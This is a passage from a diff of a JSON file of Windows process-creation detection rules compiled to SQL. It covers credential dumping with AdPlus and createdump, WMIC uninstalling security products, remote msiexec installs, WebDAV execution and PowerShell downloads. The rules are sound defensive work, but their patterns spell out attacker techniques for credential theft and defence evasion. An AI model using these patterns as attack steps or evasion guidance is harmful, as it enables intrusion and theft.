"filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "a58353df-af43-4753-bad0-cd83ef35eef5", + "title": "Use of Adplus.exe", + "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", "status": "experimental", - "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.execution", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate usage to restore snapshots", - "Legitimate admin activity" + "Legitimate usage of Adplus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ntdsutil_susp_usage.yml" + "filename": "proc_creation_win_lolbin_adplus.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", - "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "title": "Suspicious VBoxDrvInst.exe Parameters", + "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", + "status": "test", + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.002" + "attack.t1112" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Computer Password Change Via Ksetup.EXE", + "id": "de16d92c-c446-4d53-8938-10aeef41c8b6", + "status": "experimental", + "description": "Detects password change for the computer's domain account or host principal via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /setcomputerpassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_ksetup_password_change_computer.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", - "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", + "status": "experimental", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Unknown" + "System administrator usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" }, { - "title": "Service Reconnaissance Via Wmic.EXE", - "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", + "title": "Suspicious Msiexec Quiet Install From Remote Location", + "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", "status": "experimental", - "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1047" - ], + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "medium", + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_service.yml" + "filename": "proc_creation_win_msiexec_install_remote.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", + "attack.defense_evasion", + "attack.t1036", "attack.t1003.001" ], "falsepositives": [ - "Very unlikely" + "Command lines that use the same flags" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_renamed_createdump.yml" }, { - "title": "MSExchange Transport Agent Installation", - "id": "83809e84-4475-4b69-bc3e-4aad8568612f", - "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Suspicious Cmdl32 Execution", + "id": "f37aba28-a9e6-4045-882c-d5004043b337", + "status": "experimental", + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" + "filename": "proc_creation_win_lolbin_cmdl32.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", + "status": "experimental", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1134.004" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Service Started/Stopped Via Wmic.EXE", - "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", "status": "experimental", - "description": "Detects usage of wmic to start or stop a service", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_wmic_service_manipulation.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "description": "Detects a suspicious program execution in Outlook temp folder", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.t1566.001" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + ], + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + }, + { + "title": "Dropping Of Password Filter DLL", + "id": "b7966f4a-b333-455b-8370-8ca53c229762", "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "author": "Sreeman", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1036.003" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE 